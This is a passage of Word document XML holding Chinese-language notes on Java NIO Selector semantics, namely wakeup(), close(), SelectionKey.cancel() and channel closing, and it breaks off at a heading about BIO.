          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法上的线程会立马返回。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01642" w:rsidRDefault="00A01642" w:rsidP="00A01642">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="240" w:afterAutospacing="0" w:line="403" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>如果有其它线程调用了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wakeup()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法，但当前没有线程阻塞在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法上，下个调用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>方法的线程会立即</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>醒来（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>wake up</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A01642" w:rsidRPr="00A01642" w:rsidRDefault="00A01642" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EC22BF" w:rsidRDefault="008F6FDD" w:rsidP="004867CA">
      <w:pPr>
        <w:ind w:firstLine="405"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>用完</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>后调用其</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>close()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法会关闭该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，且使注册到该</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>上的所</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6FDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>有</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6FDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="008F6FDD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>实例无效。</w:t>
      </w:r>
      <w:r w:rsidRPr="008154C5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="666666"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>通道本身并不会关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124241" w:rsidRDefault="00124241" w:rsidP="00124241">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00124241">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> SelectionKey.cancel </w:t>
      </w:r>
      <w:r w:rsidRPr="00124241">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>仅仅把</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">selectionkey </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对应的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>中移除，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>仍然处于活动状态，需要手动关闭。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00124241" w:rsidRDefault="00124241" w:rsidP="00124241">
      <w:pPr>
        <w:pStyle w:val="a4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="300" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r w:rsidR="00F10914">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00002AF8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t> channel.close()/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>selector</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>移除，加关闭</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>关联的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>socket</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002677B7" w:rsidRPr="002677B7" w:rsidRDefault="002677B7" w:rsidP="002677B7">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectionKey.cancel()</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>方法可以终结通道和选择器的关系，然后</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会放在</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Selector.cancelledKeys() </w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的集合里</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>取消后</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>会立即失效，但注册不会立即取消，</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>select()</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>调用结束后，</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>cancelledKeys</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>将会处理，相应的注销完成。</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>关闭通道时，所有的相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>都会自动取消</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w:rsidR="002677B7" w:rsidRPr="002677B7" w:rsidRDefault="002677B7" w:rsidP="002677B7">
      <w:pPr>
        <w:widowControl/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:line="221" w:lineRule="atLeast"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>Selector</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>关闭时，所有注册的通道将会注销，所有相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>SelectionKey</w:t>
      </w:r>
      <w:r w:rsidRPr="002677B7">
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="宋体" w:hAnsi="Verdana" w:cs="宋体"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="15"/>
        </w:rPr>
        <w:t>会立即失效</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD0663" w:rsidRPr="00F41A4C" w:rsidRDefault="00CD0663" w:rsidP="00CD0663">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>1.2.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>0.7</w:t>
      </w:r>
      <w:r w:rsidRPr="00F41A4C">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:kern w:val="0"/>
        </w:rPr>
        <w:t>BIO</w:t>
      </w:r>
      <w:r>
